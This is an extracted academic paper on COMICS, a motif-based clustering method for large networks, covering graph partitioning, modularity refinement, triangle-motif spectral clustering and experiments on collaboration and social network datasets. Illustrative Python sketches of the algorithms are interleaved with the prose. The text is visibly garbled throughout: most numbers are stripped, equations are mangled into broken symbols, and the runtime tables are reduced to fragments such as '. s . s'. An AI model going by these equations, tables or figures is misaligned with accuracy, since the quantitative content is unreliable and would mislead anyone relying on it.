in this paper, the motifs are undirected and unweighted. the matrix b of motif is symmetrical. hence, we use (v, wa(v)) to denote (set (v), set (wa(v))) for convenience. furthermore, we regard any (v, wa(v)) ∈ tri (b, a) as a motif instance. if a and b are arbitrary or clear from context, we simply denote the motif set by tri. we define the motifs, that is, wa(v) = v, as simple motifs, and others are anchor motifs. we give an example of triangle motif definition, as shown in fig. , aiming to cluster the given five-node network by the two triangle motifs. first, we define the motifs by the description in eq. ( ). for motif tri , there are two instances of the motifs in g. meanwhile, for motif tri , g has three instances, and the anchor sets of each instance is the node whose degree is one. the definition of the triangle motif conductance replaces an edge with a motif instance of type tri. we suppose that a given network has been clustered into two subnetworks, that is, g and �g, and the conductance based on motifs can be expressed in eq. ( ), c ðgÞ tri ðsÞ ¼ ðcutðgÞtri ðg; �gÞÞ minðvolðgÞtri ðgÞ; vol ðgÞ tri ð�gÞÞ : ( ) when there is at least one anchor node in s and at least one anchor node exists in �g, a motif instance can be cut. in eq. ( ), cut ðgÞ tri ðg; �gÞ is the number of instance cut. vol ðgÞ tri ðgÞ is the number of instances, whose end nodes are in g. to be more specific, following the definition of tri in eq. ( ), as for the same wa(v), there may exist many different values of v, and nodes in wa(v) are still counted proportionally into the number of motif instances. this growth tendency of motifs is consistent with the number of nodes in networks. this can prove the availability of motifs in clustering networks. definition of motif-base matrices given a graph and a set of motif tri, the motif adjacency matrix wtri of graph is shown as: ðwtriÞij ¼ x ððv;vaðvÞÞ triÞ ðfi; jg � vaðvÞji ¼ jÞ: ( ) herein, (wtri)ij is the number of motif instances in m, where nodes i and j are both in a triangle motif. in other words, the weight will be added into (wtri)ij if and only if node i figure example of motif definition in diagram: the motifs tri and tri are leveraged to detect in the five-node graph g on the left figure. the motifs are defined by a binary matrix b and an anchor set of nodes. b and b are the binary matrices of tri and tri , respectively. similarly, a and a are the anchor node sets of tri and tri , respectively. full-size doi: . /peerj-cs. /fig- feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and node j both appear in the anchor set. in the collaboration networks, (wtri)ij depends on the number of scholars, who collaborate with both scholar i and scholar j. then, the motif diagonal degree matrix dm is defined as ðdtriÞii ¼ pn j¼ ðwtriÞij. the motif laplacian can be calculated by ltri = dtri - wtri. finally, we normalize the motif laplacian as: �tri ¼ i � d� = tri wtrid � = tri : ( ) problem statement let g = (v, e) be a connected large network, where v is the node set, and e is the edge set. if g contains several disjoint networks, it can be expressed as g = {g , g , ⋯, gn}. the complete triangle is the target motif to analyze the large-scale networks. our objective is to find the dense and stable disjoined subgraph set p ¼ fg ; g ; . .. ; g mg of the given network by motifs. 
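to make the matrix definitions above concrete, the following python sketch builds the triangle motif adjacency matrix w_tri and the normalized motif laplacian for an undirected, unweighted graph. it is a minimal illustration under stated assumptions, not the authors' implementation: the motif is taken to be the simple complete triangle with all three nodes as anchors, networkx and numpy are used, and every function name is illustrative.

import numpy as np
import networkx as nx

def motif_adjacency_matrix(G):
    # (W_tri)_ij = number of complete triangles that contain both i and j.
    # For the complete triangle motif, i and j must be adjacent, and the count
    # equals the number of their common neighbours.
    nodes = list(G.nodes())
    index = {v: k for k, v in enumerate(nodes)}
    W = np.zeros((len(nodes), len(nodes)))
    for u, v in G.edges():
        common = len(set(G[u]) & set(G[v]))
        W[index[u], index[v]] += common
        W[index[v], index[u]] += common
    return W, nodes

def normalized_motif_laplacian(W):
    # L_tri = I - D_tri^{-1/2} W_tri D_tri^{-1/2}, with (D_tri)_ii = sum_j (W_tri)_ij
    d = W.sum(axis=1)
    d_inv_sqrt = np.where(d > 0, 1.0 / np.sqrt(d), 0.0)
    D = np.diag(d_inv_sqrt)
    return np.eye(len(d)) - D @ W @ D

# usage on a small stand-in graph
G = nx.karate_club_graph()
W, nodes = motif_adjacency_matrix(G)
L = normalized_motif_laplacian(W)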
given a node v ∈ v in the network gi ∈ g, the degree of v is denoted by deg(v) and the neighbor node set of the subgraph gi in the original networks is denoted by ngi. in the partition phase, gi can be cutted into a set of subgraphs, g i ; g i ; . . . ; g ikf g. for a node v in a partition subgraph g ij of gi, we use deginter(v) and degextra(v) to represent the degree within g ij and the number of edges between g ij and gi=g ij, respectively. con(g ij) is the set of subgraphs that are connected with g ij in the partition p. variable q is the modularity score when the original graph g gets the partition p. in the process of graph partition, we cut the original networks into initial subgraphs under the four conditions. in that way, the network can be cutted into subgraphs with strong internal connectivity and weak external connectivity in both local and global aspects. the modularity score refining subprocedure can optimize the partition. then, we cluster and analyze the initial dense subgraphs by the complete triangle motif. comics algorithm in this section, we describe the whole process of our comics in details. as shown in fig. , comics consists of a series of partition refine strategies and a motif-based clustering procedure, that is, graph partition, modularity refine procedure and motif-based figure architecture of comics. full-size doi: . /peerj-cs. /fig- feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ clustering procedure. we first illustrate the graph partition techniques under four conditions and the modularity refine procedure in algorithm . after that, the motif-based clustering procedure is constructed on each subgraph in cutting set. we specify the whole clustering layer algorithm in algorithm , by which we are able to get the close and stable subgraph structures from the original input networks. graph partition and modularity refine procedures to obtain the total information of large networks effectively, we first perform cutting operations in large networks. in this subsection, we explain the graph partition and modularity refine procedures in details. we use the total large graph as the input of the partition procedure, and the procedure returns a set of partition subgraphs of the original graph. the subgraph set is refined in the modularity refine procedure by modularity score. in the graph partition procedure, we take the differences between the internal and external degrees as the degree difference value of a node v, denoted by d(v), that is, dðvÞ ¼ deginterðvÞ � degextraðvÞ: ( ) for all pairs of nodes v and u in networks, if nodes v and u fall in the same subgraph, the quantity of svsu is , otherwise, it equals to - . |e| is the total number of edges in the original network. the value of ev, u is , if there exists one edge between nodes v and u, otherwise it is . therefore, the modularity score of a network is defined as eq. ( ): q ¼ jej x v;u � ev;u � deg vð Þdeg uð Þ jej � ðsvsu þ Þ: ( ) algorithm graph partition algorithm input: large graph g, conditions output: r: a partition set p of g : add g to r : while |r| increases and rj j ¼ do : for each subgraph gi in r do : \\ rootg ij is a node from gi. a new subgraph g ij can be generated from gi with rootg ij . 
: rootg ij ¼ argmin v v deg vð Þf g : for node v in nðg ijÞ do : if v satisfies the given conditions then : add node to g ij : else : rootg ij ¼ argmin v v d vð Þf g : end if : end for : make the partition g ij=gi; gi � � : end for : end while : return r feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as described in algorithm , we take the large networks and the cutting conditions as the input of the graph partition procedure. at the beginning of this procedure, there is only one original graph added in the result partition set r. the number of subgraphs in r is represented as |r|. in each outer loop, each subgraph gi is chosen to generate new subgraphs, g ij. hence, the root node of the new subgraph g ij is selected randomly among the nodes that are with the minimum degree of the new subgraph in r. as described in lines – , the loop aims to generate the new graph from the root node from gi. if at least one neighbor node of the total new subgraph satisfies the validity of the input conditions, the neighbor node is added to the new subgraph g ij with its connectivity; otherwise, it means that there is no neighbor with this root node, and we select a new node in gi as the root to check the connectivity with the original network. the node with the minimum difference between the internal and external degrees will be the root node of g ij. then, graph partition operations will be carried until no other nodes from the original networks satisfy the cutting condition. in line of algorithm , there are two cases when selecting a new root node of the new subgraph: one is that the root node selected in line or line has no neighbor, that is, the degree of root node is . it indicates the root node vroot is invalid, and no new subgraph can be added into r. the other situation is that there is no node in g connected with the partition subgraph. in other words, the iteration of adding nodes to the new subgraph stops. then a new subgraph generated by the root node vroot is added to the subgraph set r. the iteration of the partition procedure stops when the number of subgraphs in r does not increase any more. however, if there exists one graph in r all the time, it illustrates that the root node with the minimum degree is invalid, and we have to choose another root node and restart the iteration. algorithm cuts large graph into small dense subgraphs. each loop generates a new subgraph from set r, and the loop stops when no more dense subgraph can be found. to avoid damaging the connectivity of the rest nodes, we check the connectivity of both cutting and remaining parts, if there exists more than one component, we put all subgraphs in set r to the modularity refine procedure in algorithm . the modularity refine procedure described in algorithm takes the results of the algorithm as input to refine the partition results of the original networks. as shown in algorithm , lines and enumerate two connected subgraphs: g ij and g ik in r. in the following line to line , if the two subgraphs are combined to one, it results in much higher modularity score than the original network partition. then we replace g ij and g ik by g ij [ g ik, and the iteration stops until the modularity scores do not increase any more. variable r is the result set of algorithm , containing a series of refined subgraphs. 
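as a rough illustration of the partition step just described, the sketch below grows one subgraph from a minimum-degree root and only admits neighbouring nodes that pass a vertex-level validity test; condition (internal degree greater than external degree) is used here as an example. it deliberately simplifies algorithm — the root re-selection and the repeated cutting loop are omitted — and all names are illustrative, assuming a networkx-style graph interface.

def satisfies_condition_1(G, members, v):
    # vertex-level test: internal degree of v with respect to the growing
    # subgraph must exceed its external degree
    internal = sum(1 for u in G[v] if u in members)
    return internal > G.degree(v) - internal

def grow_subgraph(G, condition=satisfies_condition_1):
    # grow a single dense subgraph from a minimum-degree root node
    root = min(G.nodes(), key=G.degree)
    members = {root}
    frontier = set(G[root])
    changed = True
    while changed and frontier:
        changed = False
        for v in list(frontier):
            if condition(G, members, v):
                members.add(v)
                frontier |= set(G[v])
                changed = True
        frontier -= members
    return members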
this procedure of graph partition aims to maintain more structure information of the original large-scale networks, so that the output partition by algorithm can achieve a higher modularity score than the input subgraph set. the operation of merging two cut subgraphs increases the internal degrees. merging two subgraphs into one can also decrease the external degree for the subgraphs in partition p. if two subgraphs can be merged, the number of edges between them is larger than that between subgraphs that cannot be merged. then, as long as the two subgraphs are merged, the external degree of the input network is reduced.

triangle motif-based clustering procedure
we take the subgraph set of the original network as the input of the motif-based clustering procedure. as shown in algorithm , its main idea is to find a single cluster in a graph by leveraging target motifs. in this procedure, we cluster the subgraphs in r by the minimum conductance, aiming to find the most stable part with the highest conductance of the given subgraph. the algorithm outputs a partition of the nodes into g and its complement ḡ. the motif conductance is symmetric in the sense that c^(G)_tri(g) = c^(G)_tri(ḡ), so that either set of nodes (g or ḡ) can be interpreted as a cluster. however, it is common that one set is substantially smaller than the other in practice. we take the larger set as a module in the network. some networks are clustered for specific motivations, such as mining the relationships of a person in social networks. in that case, algorithm takes the larger part of the clustering results g and ḡ as the cluster result, as shown from line to line . in the process of the motif-based clustering, we take the target motif and a subgraph partitioned in r (the output of algorithm ) as the input. as shown in fig. , for a given graph and a target motif, we calculate a series of matrices, that is, w_tri, d_tri, and the normalized motif laplacian, before weighting the input graph with the matrix w_tri. the graph is then cut at the minimum conductance c^(G)_tri expressed in eq. ( ). in line of algorithm , the value of c^(G)_tri is determined by a series of sorted eigenvalues of the subgraph's motif laplacian matrix. between the two cut subgraphs of the input graph, the larger one is chosen as the output result.

combined comics algorithm
in this subsection, we describe the overall algorithm of comics in algorithm . it combines all three subprocedures described in this section.

algorithm modularity refine algorithm
input: subgraph set r, empty set r′
output: refined subgraph set r′
1: for g_ij in r do
2:   for g_ik in con(g_ij) do
3:     if q(g_ij ∪ g_ik) > q(g_ij) then
4:       g_ij = g_ij ∪ g_ik
5:       remove g_ij and g_ik from r
6:       add g_ij to r′
7:     end if
8:   end for
9: end for
10: return r′

we take the large-scale networks, target motifs and the given validity conditions as the algorithm input, and obtain the clustering set of the original input network. at the beginning, a series of partition and refining operations are carried out on the input networks under the valid conditions. then we get a partition with high modularity scores of the original input large networks. each subgraph in the partition set has a strong internal connectivity and a weak external connectivity, maintaining the stable structure information of the original network.
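a minimal sketch of the modularity refine subprocedure listed above is given below. it greedily merges pairs of connected subgraphs whenever the merge raises the modularity score q of the whole partition; networkx's built-in modularity function is used in place of eq. ( ) (it computes the same newman modularity), and the pair-enumeration strategy shown is only one reasonable reading of the procedure, not the authors' code.

import itertools
from networkx.algorithms.community import modularity

def refine_partition(G, parts):
    # parts: list of disjoint node sets covering G (output of the partition step)
    parts = [set(p) for p in parts]
    improved = True
    while improved:
        improved = False
        for i, j in itertools.combinations(range(len(parts)), 2):
            if parts[i] is None or parts[j] is None:
                continue
            # only merge subgraphs that are actually connected in G
            if not any(G.has_edge(u, v) for u in parts[i] for v in parts[j]):
                continue
            merged = parts[i] | parts[j]
            current = [p for p in parts if p is not None]
            candidate = [p for k, p in enumerate(parts)
                         if p is not None and k not in (i, j)] + [merged]
            # keep the merge only if it improves the modularity score Q
            if modularity(G, candidate) > modularity(G, current):
                parts[i], parts[j] = merged, None
                improved = True
        parts = [p for p in parts if p is not None]
    return parts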
furthermore, we carry the motif-based clustering operations on the subgraph in the partition set. finally, we can get the non-overlapping optimal partition of the original graph. time complexity analysis in this section, we analyze the time complexity of comics. the main clustering layer includes the following three phases: graph partition, graph refining and motif-clustering. algorithm triangle motif-based clustering algorithm input: graph g and motif tri output: subgraph set of the original network : (wtri)ij = number of triangle motif instances of tri : gtri ) weighted graph induced wtri : dtri = diagonal matrix with ðdtriÞii ¼ pn j¼ ðwtriÞij : �tri ¼ i � d� = tri wtrid � = tri : z = eigenvector of second smallest eigenvalue for �tri : ri = to be the index of d ðð� Þ= Þ tri : z = ith smallest value : g ¼ argminl cðgÞtri ðglnodeÞ; where l ¼ s ; � � � ; sk : if gj j > �gj j then : return g : else : return �g : end if figure triangle motif-based clustering of comics. full-size doi: . /peerj-cs. /fig- feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we assume m and n as the number of edges and nodes in the network. here, d(v) is the degree of node v and dmax is the maximal degree in the network. graph partition procedure: to get and parse the information from large networks effectively, we first apply cutting operations on the large-scale networks. we analyze the worst case of the graph partition subprocedure. in the first cutting iteration, the root node is one of the nodes with the smallest degree in the graph, and its time complexity is o(n). for each new subgraph g generated by root node v, we check the connectivity of the new-added nodes, including the internal and external links with subgraph g and check the corresponding conditions before partitioning. the time complexity of this procedure is oðn d maxÞ. modularity refining procedure: in the subgraph refining procedure, we use modularity score q (newman, ) to get a suitable partition. the required time of iterations is up to the number of subgraphs in the result sets r, which are generated by the graph partition procedure. we define the number of subgraphs in r as p, and the runtime of the procedure is determined by the step of calculating q, whose computation complexity is o[(m + n)n]. because the first refining subgraph need to check the other p - subgraphs and the second one checks the remaining p - . hence, the total checking times is p / . therefore, the computation complexity of the refining procedure is o[p (m + n)n/ ]. triangle motif-based clustering procedure: in general, the time complexity of the algorithm is determined by the construction of the adjacency matrix and the solution of the eigenvector. for simplicity, we consider that we can access network edges within o( ), and modify matrix entries within o( ). the complexity of calculating the eigenvectors through laplacian matrix is o((m + n) (log n)o( )), and sorting the eigenvector indexes can be finished in time o(n log n). for a motif with three nodes, we can compute wm in �(n ) in a complete graph with n nodes. therefore, the computation complexity of the motif-based analysis procedure is o(n ). according to the description above, the time complexity of comics is o(rn ), where r is the number of subgraphs in the partition set r, and n is the number of nodes. 
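the spectral step of the triangle motif-based clustering procedure can be sketched as follows, reusing the motif adjacency matrix from the earlier sketch: nodes are ordered by the eigenvector of the second smallest eigenvalue of the normalized motif laplacian, a sweep over that ordering keeps the prefix with minimum motif conductance, and the larger of the two sides is returned. this is an illustrative reading of the algorithm rather than the authors' implementation, and the o(n^3) sweep below favours clarity over speed.

import numpy as np

def motif_spectral_cut(W):
    # W: motif adjacency matrix of one partitioned subgraph
    d = W.sum(axis=1)
    d_inv_sqrt = np.where(d > 0, 1.0 / np.sqrt(d), 0.0)
    L = np.eye(len(d)) - np.diag(d_inv_sqrt) @ W @ np.diag(d_inv_sqrt)
    eigvals, eigvecs = np.linalg.eigh(L)
    z = eigvecs[:, 1]                       # eigenvector of the second smallest eigenvalue
    order = np.argsort(d_inv_sqrt * z)      # sweep ordering of the nodes
    total_vol = d.sum()
    best_set, best_cond = None, np.inf
    vol = 0.0
    for k in range(len(order) - 1):
        vol += d[order[k]]
        prefix, rest = order[:k + 1], order[k + 1:]
        cut = W[np.ix_(prefix, rest)].sum() # weight of motif instances cut by this prefix
        denom = min(vol, total_vol - vol)
        if denom > 0 and cut / denom < best_cond:
            best_cond, best_set = cut / denom, set(int(i) for i in prefix)
    if best_set is None:                    # no triangle structure to cut on
        return set(range(W.shape[0]))
    other = set(range(W.shape[0])) - best_set
    return best_set if len(best_set) >= len(other) else other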
experiments in this section, we compare comics with k-means and co-authorship team detection algorithm from the perspectives of network clustering accuracy and time complexity, algorithm combined comics algorithm input: large graph g, conditions and motif tri output: motif-based cluster set (subset of nodes in g) : set r as an empty set : r = graph partition algorithm(g, conditions) : r = modularity refine algorithm(r) : for g in r do : g = triangle motif-based clustering algorithm(g, tri) : add g to r : end for : return r feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ respectively. we choose four large-scale networks, including two social network, that is, facebook and gemsec-deezer data sets (leskovec & krevl, ; rozemberczki et al., ) and two academic collaboration networks, that is, aps and mag data sets. we analyze the accuracy of the clustering results by calculating compactness and separation. we demonstrate the efficiency of our solution in both academic collaboration and social networks. we also consider other statistical data information of academic networks, tcvs, tpvs, and msv. all those corresponding metrics are illustrated in this section. all experiments are conducted on a desktop with intel(r) xeon(r) cpu e - v @ . ghz (two processors) and gb memory. the operating system is window , and the codes are written in python. the american physical society data set ( – ) consists of , papers associated with , scholars in the physical field. meanwhile, the mag data set ( – ) on computer science includes , scholars with , papers in the computer science area. edges in the academic networks represent two authors have coauthored at least one paper. the facebook social network data set in our experiments contains eight networks, , nodes and , , edges. we list the eight social networks in table . in that case, we cluster the social networks by the different categories listed in the data set. gemsec-deezer data set collected by deezer (november ) is also experimentalized in this paper. this data set contains , nodes and , edges from three countries, romania ( , nodes and , edges), croatia ( , nodes and , edges) and hungray ( , nodes and , edges). experiment settings in this subsection, we describe the settings of our experiments from three aspects, that is, time cost, clustering accuracy and academic teamwork behavior analysis with complete triangle motif in academic areas. in academic collaboration networks, we consider two algorithms. the facebook social networks do not contain any statistical information. therefore, we merely compare our method with k-means algorithm in the social network: k-means clustering algorithm (ding & he, ): this method proves that principal components are the continuous solutions to cluster membership indicators for k-means clustering. it takes principal component analysis into the clustering process, which is suitable for the scholar science and social data sets. co-authorship algorithm (reyes-gonzalez, gonzalez-brambila & veloso, ): this algorithm considers all the principal investigators and collaborators, and defines table facebook date sets. tv shows politician government public figures node , , , , edge , , , , athletes company new sites artist node , , , , edge , , , , feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ knowledge footprints of the groups to calculate the distances between scholars and the group. based on the distance, the academic groups can be detected in an accurate way. this method iterates all the researchers with their collaborator and institution similarities until they are assigned to a academic team can be applied to understand the self-organizing of research teams and obtain the better assessment of their performances. to demonstrate the runtime efficiency and the accuracy of our clustering results in large-scale networks, we divide the aps and mag data sets into different parts with various sizes by years, respectively, so that we can get the collaboration networks with distinct number of nodes (from , to , ). considering the integrality and veracity of the academic research teams in data sets, we take the whole aps and mag data sets as the collaboration networks to detect the collaborative relationships. evaluation metrics to evaluate and analyze the accuracy of network clustering results of our proposed comics, we use two metrics, that is, compactness and separation, to evaluate node closeness in clustering results and the distances among clusters. in academic collaboration networks, we combine the statistical paper publishing data with network structures together, and calculate three metrics to find the characteristics discovered through the target triangle motif to uncover the hidden collaboration patterns and teamwork of scholars in academic networks. compactness and separation (halkidi, batistakis & vazirgiannis, ) are used to evaluate the accuracy of clustering results by different methods. compactness is a widely used metric to quantify the tightness of clustering subgraphs, representing the distances between nodes in a subgraph. separation calculates the distances among the cores of different subgraphs. that is, if a clustering subgraph is with lower compactness value and higher separation value, the subgraph can be detected effectively. compactness is expressed by eq. ( ), compactness ¼ rj j x vi � vi � wj j: ( ) here, r is the clustering result set, vi is one of the nodes in the subgraph, and w is defined as the core of the subgraph cluster, because w is the node with the maximum degree in a cluster. the value of |vi - w| means the shortest distance between node vi and the cluster core node w. sp is defined as in eq. ( ). separation ¼ k � k xk i¼ xk j¼iþ jwi � wjj; ( ) wherein, k is the number of subgraphs in the result set and wi is the core of the given subgraph i, which is the same as wj. the value of |wi - wj| equals to the shortest distance between wi and wj. knowledge footprints of a group are the union of all the backward citations used by group members in all of their papers within a specific time period. feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in collaboration networks, we assume the clusters as academic teams, in which scholars work together. therefore, three metrics are defined to analyze the collaboration behaviors through triangle motif: tcv, tpv, and msv. tcv: this metric reflects the tightness and volatility among members in a team. for one scholar i in a team, we define the tcv as follows, sco ¼ pn i ðcoi � coaveÞ n : ( ) herein, n is the number of team members, coi is the number of scholars that scholar i has collaborated within the same team, and coave is the average number of collaborators collaborated with scholars in a team. 
tpv: an academic team with high performance refers that the members in team have published a large number of paper. similarly, in a stable team, the gaps of published paper numbers among team members are small. to evaluate the academic levels and stability of a team, we define tpv as follows: sqtt ¼ pn i ðqi � qaveÞ n ; ( ) where sqtt means scholar i’s variance of publishing papers in the detected team, qi is the number of papers that scholar i has published, and qave is the average number of papers in the team. msv: this metric calculates the difference of motif number that the scholar nodes are included in the collaboration networks. we define the msv as follows, sprimitive ¼ pn i ðti � taveÞ n : ( ) herein, ti is the number of target motif that scholar i owns, and tave is the average motifs of a team. to uncover the collaboration patterns mined by triangle motifs among scholars in academic teams, we use the above three arguments to analyze relationships between productions and motifs of the clustered academic teams. results and discussion in this section, we evaluate the experimental results by comparing with k-means and co-authorship algorithm in both runtime and the effectiveness. in the view of internal and external connections, we calculate compactness and separation values for each algorithm results. the time cost results of three networks are shown in tables – , respectively. “k” in the tables represents thousand, for example, “ k” means a network with one thousand nodes. n/a means that the clustering procedure takes more than days. according to tables – , it can be concluded that, in small networks (less than , nodes), the three methods make little differences in running time. however, as the size of network increases, our clustering algorithm costs the least time. the time costs in feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ different data sets make little differences. however, the results show the same trend and the proposed method takes more time in small networks and outperforms other large networks. as shown in tables and , when academic collaboration networks contain more than , nodes, comics takes the least time than the other two algorithms. more than that, in social networks, the time cost of our method is also satisfied in large size networks. therefore, it can be concluded that though the partition operations cost a table aps runtime. comics co-authorship k-means k . s . s . s k . s . s . s k , . s , . s . h k . h , . s . h k . h . h . h k . h . h > h k . h . h > h k . h > h n/a table mag runtime. comics co-authorship k-means k . s . s . s k . s . s . s k , . s . s . h k . h , . s . h k . h . h . h k . h . h > h k . h . h > h k . h . h n/a k . h > h n/a table social network runtime. comics k-means tv shows . s . s politician , . s . s government . h . h public figures . h . h athletes . h . h company . h . h new sites . h . h artist . h . h romania . h . h hungray . h . h croatia . h . h feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lot of time, it is necessary to apply the speeding up techniques in clustering. moreover, for different types of networks, topological structures, density are also vital factors that can effect the clustering procedures and results. figures a and a show the compactness values generated by our algorithm and the comparing algorithms on different sizes of networks, respectively. 
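the three teamwork metrics defined above (tcv, tpv, and msv) share the same form, a population variance of a per-scholar quantity over the members of a detected team. the sketch below computes them from per-scholar counts; the record fields ("collaborators", "papers", "motifs") are illustrative names, not part of the data sets.

import numpy as np

def team_variance(values):
    # variance of a per-scholar quantity around the team average,
    # the common form of the tcv, tpv and msv equations
    values = np.asarray(values, dtype=float)
    return float(((values - values.mean()) ** 2).sum() / len(values))

def team_metrics(team):
    # team: list of per-scholar records, e.g.
    # {"collaborators": 5, "papers": 12, "motifs": 9}
    return {
        "tcv": team_variance([m["collaborators"] for m in team]),
        "tpv": team_variance([m["papers"] for m in team]),
        "msv": team_variance([m["motifs"] for m in team]),
    }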
as the figures show, in collaboration networks, compactness values corresponding to different networks are lower than those in co-authorship algorithm and k-means algorithm, which are similar with that in social networks. our algorithm performs better than the two comparing algorithms. figures b and b plot the separation values of the three algorithms with the network growth in both academic, facebook social and gemsec-deezer networks. it can be seen that with the growing network size, comics achieves the highest separation values. this means subgraphs clustered by our method have greater separation values all the time. according to figs. b and b, we can conclude that the distances among core nodes in each cluster are close no matter what algorithms are used. the reason is that no matter what algorithms are used in the target network, the core nodes of clusters are almost the same. all the core nodes are with the maximum degrees. in all, our clustering algorithm achieves the best subgraph clustering results obviously. analysis in academic collaboration networks after analyzing the time complexity and effectiveness of our system above, in this subsection, we analyze the clustering results with the triangle motifs in academic collaboration networks. the results prove the triangle motif structures can reflect the hidden statistical information and connections with network structures. for example, as the analysis results show, collaboration patterns as well as the correlations of network structure and team productions can be summarized in the academic collaboration networks. we regard the cluster results of each academic collaboration network as an academic team. then the values of three variances, that is, tpv, tcv, and msv are calculated, and the results are shown in figs. a and b. hence, we can see that the number of high-order triangle motif can reflect the performance of an academic team to some extent. figure the variation tendency of compactness and separation values of collaboration network clustering results with comics, co-authorship and k-means algorithms. (a) compactness in aca- demic collaboration networks and (b) separation in academic collaboration networks. full-size doi: . /peerj-cs. /fig- feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ according to figs. a and b, we conclude that the tpv and tcv are both proportional to the msv. meanwhile, the tpv is also approximately positive linear with the msv. that means, the lower the msv is in a cluster team, the performance of team members are in smaller gaps. therefore, it can be concluded that the value of msv can reflect the gap of collaboration relationships in teams and performance of team members. however, we can infer that the scholars with few number of complete triangle motifs, have collaborated with only few scholars in the team. those scholars are probably students or new team members, resulting in the high collaboration and paper variances. hence, in collaboration networks, we can use msv to evaluate the gaps of team collaboration relationships and the performance of team members. the two teamwork gaps in different periods represent the stability and volatility of academic teams. conclusion in this paper, we put forth the high-order motif-based clustering system to get a subgraph set from the large-scale networks. 
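for reference, the compactness and separation values plotted above can be computed along the following lines, taking the node with maximum degree as each cluster core and shortest-path lengths as distances, as defined in the evaluation metrics subsection. the exact normalisation in the original equations is not fully recoverable from the extracted text, so the averaging used here is one plausible reading; all names are illustrative.

import networkx as nx

def cluster_core(G, cluster):
    # core of a cluster: its node with maximum degree
    return max(cluster, key=G.degree)

def compactness(G, clusters):
    # average shortest-path distance from each node to its cluster core (lower is tighter)
    total, count = 0, 0
    for c in clusters:
        dist = nx.single_source_shortest_path_length(G, cluster_core(G, c))
        total += sum(dist.get(v, 0) for v in c)
        count += len(c)
    return total / count

def separation(G, clusters):
    # average shortest-path distance between cluster cores (higher is better separated)
    cores = [cluster_core(G, c) for c in clusters]
    k, total = len(cores), 0
    for i in range(k):
        dist = nx.single_source_shortest_path_length(G, cores[i])
        total += sum(dist.get(cores[j], 0) for j in range(i + 1, k))
    return 2 * total / (k * (k - 1))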
in the constructed system, we take graph partition and refining techniques to speed up algorithm runtime. through network cutting, we check the figure the variation tendency of compactness and separation values of the clustering results in social networks with comics and k-means algorithms. (a) compactness in social networks and (b) separation in social networks. full-size doi: . /peerj-cs. /fig- figure positive relations in collaboration networks through collaboration variances, paper variances and motif variances of each clustering. red rectangles and blue triangles represent the col- laboration academic teams clustered from mag and aps data sets, respectively. (a) relationships between tcv and msv and (b) relationships between tpv and msv. full-size doi: . /peerj-cs. /fig- feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ four cutting conditions from the aspect of network connectivity, which can prevent damaging the global structures of large-scale networks. experiments are carried on four large networks, that is, aps and mag from the academic area, facebook and gecsec-deezer networks from the social area, respectively. the results demonstrate the effectiveness of our method in time cost and accuracy in large-scale network clustering. furthermore, the collaboration teamwork analysis verifies the availability of complete triangle motif, which represents the smallest collaboration unit in the collaboration networks. we analyze the collaboration clustering results with three metrics, that is, tcv, tpv, and msv. the results show that both tcv and tpv are proportional to msv. therefore, it can be concluded that the value of msv can reflect the two gaps, that is, collaborative relationships and performance of different team members. besides, the two gaps in different periods can also reflect the dynamic change of team members. in the future, we will focus on dynamic motif clustering for real-time network management (ning et al., ; ning, huang & wang, ; wang et al., a). in addition, network security (wang et al., b, ) and crowdsourcing based methods (ning et al., a, b) also deserve to be investigated. additional information and declarations funding this work is supported by china postdoctoral science foundation under grant t and state key laboratory for novel software technology, nanjing university, under grant kfkt b . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: china postdoctoral science foundation: t . state key laboratory for novel software technology, nanjing university: kfkt b . competing interests the authors declare that they have no competing interests. author contributions � yufan feng conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. � shuo yu conceived and designed the experiments. � kaiyuan zhang analyzed the data, contributed reagents/materials/analysis tools, performed the computation work. � xiangli li performed the experiments, analyzed the data, performed the computation work. 
� zhaolong ning conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: data is available through the american physical society (aps) and microsoft academic graph (mag). specifically: facebook network data can be found here: http://snap.stanford.edu/data/ego-facebook.html. gemsec-deezer network data can be found here: http://snap.stanford.edu/data/gemsec- deezer.html. code can be found here: https://github.com/yffre/comics. references bagrow jp. . evaluating local community methods in networks. journal of statistical mechanics: theory and experiment ( ):p doi . / - / / /p . barjak f, robinson s. . international collaboration, mobility and team diversity in the life sciences: impact on research performance. social geography ( ): – doi . /sg- - - . benson ar, gleich df, leskovec j. . higher-order organization of complex networks. science ( ): – doi . /science.aad . bian x, zhang k. . modeling network with topic model and triangle motif. in: ubiquitous intelligence and computing and ieee international conference on autonomic and trusted computing and ieee international conference on scalable computing and communications and its associated workshops, piscataway: ieee, – . bordons m, gomez i, fernández m, zulueta m, 